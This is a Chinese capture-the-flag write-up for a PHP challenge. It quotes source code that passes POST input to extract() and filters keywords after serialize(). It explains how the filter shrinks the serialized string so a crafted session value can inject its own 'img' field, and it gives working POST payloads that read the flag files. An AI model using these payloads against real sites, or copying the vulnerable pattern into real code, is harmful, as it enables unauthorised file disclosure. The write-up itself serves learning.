进来点击source_code就可以看到源码
<?php
$function = @$_GET['f'];
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}//简单的过滤
if($_SESSION){
unset($_SESSION);
}//如果存在SESSION,则将其置空
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
extract($_POST);//变量覆盖
if(!$function){
echo '<a href="index.php?f=highlight_file">source_code</a>';
}
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
$serialize_info = filter(serialize($_SESSION));//序列化之后再过滤
if($function == 'highlight_file'){
highlight_file('index.php');
}else if($function == 'phpinfo'){
eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
}
看extract()函数的功能:
如果post传参为_SESSION[flag]=123,那么$_SESSION["user"]和$_SESSION["function"]的值都会被覆盖
先看一下phpinfo有什么东西
这里有个d0g3_f1ag.php
再看
$serialize_info = filter(serialize($_SESSION));
...
}else if($function == 'show_image'){
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
}
大佬的一段分析:
若SESSION参数:
$_SESSION["user"] = 'guestflagflagflagflag';
$_SESSION['function'] = 'aaaa';
$_SESSION['img']=base64_encode('guest_img.png');
序列化:
a:3:{s:4:"user";s:5:"guestflagflagflagflag";s:8:"function";s:4:"aaaa";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
经过filter关键字会过滤掉flag,于是序列化字段会变短,过滤后的结果:
a:3:{s:4:"user";s:21:"guest";s:8:"function";s:4:"aaaa";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
由于user字段值的长度仍为21,所有会往后吞21个字符,一直吞到guest";s:8:"function",那有没有一种可能我让function的值足够长能够包含我们指定为base64(dog3_flag.php)的img序列化的内容字段且被过滤掉关键字长度刚好能把img序列化字段吞进去,达到指定img赋值的效果?上栗子:
首先得让img序列包含在function中这样我们才能通过吞取赋值img的值,我们指定:
$_SESSION["user"] = 'guestflagflagflagflagflagflagflag';
$_SESSION['function'] = 'aaaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"ctf";s:6:"webctf";}';
在序列化SESSION得:
a:3:{s:4:"user";s:33:"guestflagflagflagflagflagflagflag";s:8:"function";s:69:"aaaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"ctf";s:6:"webctf";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
经过filter过滤的结果:
a:3:{s:4:"user";s:33:"guest";s:8:"function";s:69:"aaaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"ctf";s:6:"webctf";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
由于替换了7个flag关键字,会往后吞28个字符串,刚好将guest";s:8:"function";s:69:"aaaaa 赋给了user,后面构造img变量,后面是随便添加的一个变量,刚好满足三个变量,反序列化读取到webctf就结束了,后面的img被丢掉了。这样就完成了img的赋值。
所以payload:
?f=show_image
POST:_SESSION[user]=guestflagflagflagflagflagflagflag&_SESSION[function]=aaaaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"ctf";s:6:"webctf";}
然后查看页面源代码
flag在根目录下的d0g3_fllllllag
/d0g3_fllllllag的Base64编码为L2QwZzNfZmxsbGxsbGFn,更改img为L2QwZzNfZmxsbGxsbGFn,访问
?f=show_image
POST:_SESSION[user]=guestflagflagflagflagflagflagflag&_SESSION[function]=aaaaa";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:3:"ctf";s:6:"webctf";}